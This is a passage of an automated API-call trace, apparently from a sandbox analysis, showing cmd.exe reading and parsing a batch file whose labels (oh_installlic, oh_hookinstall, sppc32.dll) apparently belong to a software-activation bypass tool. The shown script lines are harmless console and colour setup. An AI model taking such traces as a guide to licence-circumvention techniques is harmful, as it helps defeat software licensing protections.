(_String1="_colorprep", _String2="") returned 95 [0176.504] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.504] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.504] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.504] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.504] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.504] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.504] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.504] _wcsicmp (_String1="_colorprep", _String2="starto16c2r") returned -20 [0176.504] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.504] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="startmsi") returned -20 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.505] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.506] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.506] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.506] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.506] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.506] _wcsicmp (_String1="_colorprep", _String2="oh_uninstall") returned -16 [0176.506] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.506] _wcsicmp (_String1="_colorprep", _String2="oh_reset") returned -16 [0176.506] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.506] _wcsicmp (_String1="_colorprep", _String2="oh_getpath") returned -16 [0176.507] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.507] _wcsicmp (_String1="_colorprep", _String2="oh_installkey") returned -16 [0176.507] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.507] _wcsicmp (_String1="_colorprep", _String2="oh_installlic") returned -16 [0176.507] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.507] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.507] _wcsicmp (_String1="_colorprep", _String2="oh_hookinstall") returned -16 [0176.507] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.507] _wcsicmp (_String1="_colorprep", _String2="oh_process") returned -16 [0176.507] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.507] _wcsicmp (_String1="_colorprep", _String2="oh_msiproducts") returned -16 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="oh_processmsi") returned -16 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="oh_actids") returned -16 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.508] _wcsicmp (_String1="_colorprep", _String2="ohookdata") returned -16 [0176.509] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.509] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.509] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.509] _wcsicmp (_String1="_colorprep", _String2="oh_extractdll") returned -16 [0176.509] _wcsicmp (_String1="_colorprep", _String2="hexedit") returned -9 [0176.510] _wcsicmp (_String1="_colorprep", _String2="hexedit") returned -9 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.510] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.511] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.511] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.511] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.511] _wcsicmp (_String1="_colorprep", _String2="sppc32.dll") returned -20 [0176.526] _close (_FileHandle=3) returned 0 [0176.526] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.526] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0176.529] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.529] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0176.529] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.530] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0176.530] SetConsoleInputExeNameW () returned 0x1 [0176.530] GetConsoleOutputCP () returned 0x1b5 [0176.530] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0176.530] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.531] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efe870, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0176.531] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0176.531] _get_osfhandle (_FileHandle=3) returned 0xac [0176.531] SetFilePointer (in: hFile=0xac, lDistanceToMove=355220, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56b94 [0176.531] GetProcessHeap () returned 0x19a8f1e0000 [0176.531] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a70) returned 1 [0176.531] GetProcessHeap () returned 0x19a8f1e0000 [0176.532] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0176.532] GetProcessHeap () returned 0x19a8f1e0000 [0176.532] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0176.532] GetProcessHeap () returned 0x19a8f1e0000 [0176.532] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0176.532] GetProcessHeap () returned 0x19a8f1e0000 [0176.532] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0176.533] _get_osfhandle (_FileHandle=3) returned 0xac [0176.533] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56b94 [0176.533] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x1fff, lpOverlapped=0x0) returned 1 [0176.533] SetFilePointer (in: hFile=0xac, lDistanceToMove=355222, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56b96 [0176.533] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nll :_colorprep\r\n10586 reg query \"HKCU\\Console\" /v ForceV2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 2 [0176.533] _get_osfhandle (_FileHandle=3) returned 0xac [0176.533] GetFileType (hFile=0xac) returned 0x1 [0176.533] _get_osfhandle (_FileHandle=3) returned 0xac [0176.533] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56b96 [0176.533] GetProcessHeap () returned 0x19a8f1e0000 [0176.533] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.533] GetProcessHeap () returned 0x19a8f1e0000 [0176.534] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.534] _tell (_FileHandle=3) returned 355222 [0176.534] _close (_FileHandle=3) returned 0 [0176.534] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efe870, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0176.534] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0176.534] _get_osfhandle (_FileHandle=3) returned 0xac [0176.534] SetFilePointer (in: hFile=0xac, lDistanceToMove=355222, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56b96 [0176.534] _get_osfhandle (_FileHandle=3) returned 0xac [0176.534] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56b96 [0176.534] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x1fff, lpOverlapped=0x0) returned 1 [0176.535] SetFilePointer (in: hFile=0xac, lDistanceToMove=355241, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56ba9 [0176.535] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_NCS% EQU 1 (\r\n", cbMultiByte=19, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if %_NCS% EQU 1 (\r\n0586 reg query \"HKCU\\Console\" /v ForceV2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 19 [0176.535] _get_osfhandle (_FileHandle=3) returned 0xac [0176.535] GetFileType (hFile=0xac) returned 0x1 [0176.535] _get_osfhandle (_FileHandle=3) returned 0xac [0176.535] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56ba9 [0176.535] GetProcessHeap () returned 0x19a8f1e0000 [0176.535] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.535] GetProcessHeap () returned 0x19a8f1e0000 [0176.535] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201de0 [0176.535] GetProcessHeap () returned 0x19a8f1e0000 [0176.535] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb920 [0176.535] GetEnvironmentVariableW (in: lpName="_NCS", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1 [0176.535] GetProcessHeap () returned 0x19a8f1e0000 [0176.535] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0176.535] GetProcessHeap () returned 0x19a8f1e0000 [0176.536] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201de0) returned 1 [0176.536] GetProcessHeap () returned 0x19a8f1e0000 [0176.536] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.536] _wcsicmp (_String1="if", _String2=")") returned 64 [0176.536] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0176.536] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0176.536] _wcsicmp (_String1="IF", _String2="if") returned 0 [0176.536] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0176.536] GetProcessHeap () returned 0x19a8f1e0000 [0176.536] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0176.536] GetProcessHeap () returned 0x19a8f1e0000 [0176.536] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecb00 [0176.536] GetProcessHeap () returned 0x19a8f1e0000 [0176.536] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1eccc0 [0176.537] GetProcessHeap () returned 0x19a8f1e0000 [0176.537] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eccc0, Size=0x16) returned 0x19a8f1ec700 [0176.537] GetProcessHeap () returned 0x19a8f1e0000 [0176.537] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec700) returned 0x16 [0176.537] _wcsicmp (_String1="1", _String2="/I") returned 2 [0176.537] GetProcessHeap () returned 0x19a8f1e0000 [0176.537] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0176.537] GetProcessHeap () returned 0x19a8f1e0000 [0176.537] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1eca20 [0176.537] _wcsicmp (_String1="ERRORLEVEL", _String2="1") returned 52 [0176.537] _wcsicmp (_String1="EXIST", _String2="1") returned 52 [0176.537] _wcsicmp (_String1="CMDEXTVERSION", _String2="1") returned 50 [0176.537] _wcsicmp (_String1="DEFINED", _String2="1") returned 51 [0176.537] _wcsicmp (_String1="NOT", _String2="1") returned 61 [0176.537] GetProcessHeap () returned 0x19a8f1e0000 [0176.537] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecc80 [0176.537] _wcsicmp (_String1="EQU", _String2="EQU") returned 0 [0176.537] GetProcessHeap () returned 0x19a8f1e0000 [0176.537] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec660 [0176.537] GetProcessHeap () returned 0x19a8f1e0000 [0176.537] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0176.537] _get_osfhandle (_FileHandle=3) returned 0xac [0176.537] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56ba9 [0176.537] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe590, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe590*=0x1fff, lpOverlapped=0x0) returned 1 [0176.538] SetFilePointer (in: hFile=0xac, lDistanceToMove=355299, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56be3 [0176.538] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for /F %%a in ('echo prompt $E ^| cmd') do set \"esc=%%a\"\r\n", cbMultiByte=58, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="for /F %%a in ('echo prompt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 58 [0176.538] _get_osfhandle (_FileHandle=3) returned 0xac [0176.538] GetFileType (hFile=0xac) returned 0x1 [0176.538] _get_osfhandle (_FileHandle=3) returned 0xac [0176.538] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56be3 [0176.538] GetProcessHeap () returned 0x19a8f1e0000 [0176.538] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.538] GetProcessHeap () returned 0x19a8f1e0000 [0176.538] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.538] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0176.538] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0176.538] GetProcessHeap () returned 0x19a8f1e0000 [0176.538] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0176.538] GetProcessHeap () returned 0x19a8f1e0000 [0176.538] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8a60 [0176.538] GetProcessHeap () returned 0x19a8f1e0000 [0176.538] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0176.539] GetProcessHeap () returned 0x19a8f1e0000 [0176.539] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb860, Size=0x1a) returned 0x19a8f1eb6b0 [0176.539] GetProcessHeap () returned 0x19a8f1e0000 [0176.539] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb6b0) returned 0x1a [0176.539] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0176.539] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0176.539] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0176.539] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0176.539] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0176.539] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0176.539] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0176.539] _wcsicmp (_String1="IN", _String2="in") returned 0 [0176.539] GetProcessHeap () returned 0x19a8f1e0000 [0176.539] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb770 [0176.539] GetProcessHeap () returned 0x19a8f1e0000 [0176.539] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb770, Size=0x2a) returned 0x19a8f1e0b70 [0176.539] GetProcessHeap () returned 0x19a8f1e0000 [0176.539] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0b70) returned 0x2a [0176.539] GetProcessHeap () returned 0x19a8f1e0000 [0176.539] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0b70, Size=0x30) returned 0x19a8f1e0c30 [0176.539] GetProcessHeap () returned 0x19a8f1e0000 [0176.539] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0c30) returned 0x30 [0176.539] GetProcessHeap () returned 0x19a8f1e0000 [0176.539] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0c30, Size=0x34) returned 0x19a8f1e0ff0 [0176.539] GetProcessHeap () returned 0x19a8f1e0000 [0176.539] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0ff0) returned 0x34 [0176.539] GetProcessHeap () returned 0x19a8f1e0000 [0176.539] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0ff0, Size=0x3e) returned 0x19a8f1f9450 [0176.540] GetProcessHeap () returned 0x19a8f1e0000 [0176.540] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9450) returned 0x3e [0176.540] _wcsicmp (_String1="DO", _String2="do") returned 0 [0176.540] _wcsicmp (_String1="set", _String2=")") returned 74 [0176.540] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.540] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.540] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.540] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.540] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.540] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.540] GetProcessHeap () returned 0x19a8f1e0000 [0176.540] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee610 [0176.540] GetProcessHeap () returned 0x19a8f1e0000 [0176.540] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec720 [0176.540] GetProcessHeap () returned 0x19a8f1e0000 [0176.540] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb6e0 [0176.540] _get_osfhandle (_FileHandle=3) returned 0xac [0176.540] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56be3 [0176.540] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe530, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe530*=0x1fff, lpOverlapped=0x0) returned 1 [0176.540] SetFilePointer (in: hFile=0xac, lDistanceToMove=355301, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56be5 [0176.540] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nr /F %%a in ('echo prompt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 2 [0176.540] _get_osfhandle (_FileHandle=3) returned 0xac [0176.540] GetFileType (hFile=0xac) returned 0x1 [0176.541] _get_osfhandle (_FileHandle=3) returned 0xac [0176.541] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56be5 [0176.541] GetProcessHeap () returned 0x19a8f1e0000 [0176.541] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.541] GetProcessHeap () returned 0x19a8f1e0000 [0176.541] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.541] _get_osfhandle (_FileHandle=3) returned 0xac [0176.541] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56be5 [0176.541] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe530, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe530*=0x1fff, lpOverlapped=0x0) returned 1 [0176.541] SetFilePointer (in: hFile=0xac, lDistanceToMove=355325, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56bfd [0176.541] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Red=\"41;97m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"Red=\"41;97m\"\"\r\nmpt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 24 [0176.541] _get_osfhandle (_FileHandle=3) returned 0xac [0176.541] GetFileType (hFile=0xac) returned 0x1 [0176.541] _get_osfhandle (_FileHandle=3) returned 0xac [0176.541] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56bfd [0176.542] GetProcessHeap () returned 0x19a8f1e0000 [0176.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.542] GetProcessHeap () returned 0x19a8f1e0000 [0176.542] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.542] GetProcessHeap () returned 0x19a8f1e0000 [0176.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0176.542] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.542] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.542] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.542] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.542] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.542] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.542] GetProcessHeap () returned 0x19a8f1e0000 [0176.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee790 [0176.542] GetProcessHeap () returned 0x19a8f1e0000 [0176.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec900 [0176.542] GetProcessHeap () returned 0x19a8f1e0000 [0176.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0eb0 [0176.543] _get_osfhandle (_FileHandle=3) returned 0xac [0176.543] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56bfd [0176.543] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe500, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe500*=0x1fff, lpOverlapped=0x0) returned 1 [0176.543] SetFilePointer (in: hFile=0xac, lDistanceToMove=355350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56c16 [0176.543] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Gray=\"100;97m\"\"\r\n", cbMultiByte=25, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"Gray=\"100;97m\"\"\r\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 25 [0176.543] _get_osfhandle (_FileHandle=3) returned 0xac [0176.543] GetFileType (hFile=0xac) returned 0x1 [0176.543] _get_osfhandle (_FileHandle=3) returned 0xac [0176.543] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 